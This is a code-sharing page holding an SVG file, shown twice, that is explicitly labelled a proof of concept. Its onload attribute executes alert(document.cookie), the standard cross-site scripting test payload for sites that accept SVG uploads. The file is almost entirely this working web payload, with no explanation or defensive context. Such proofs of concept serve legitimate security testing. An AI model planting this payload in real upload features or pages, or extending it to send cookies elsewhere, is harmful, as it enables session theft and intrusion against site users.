Skip to content

Instantly share code, notes, and snippets.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="alert(document.cookie)">
<rect width="200" height="200" fill="#eee"/>
<text x="10" y="20" font-size="12">PoC — alert(document.cookie)</text>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="alert(document.cookie)">
<rect width="200" height="200" fill="#eee"/>
<text x="10" y="20" font-size="12">PoC — alert(document.cookie)</text>
</svg>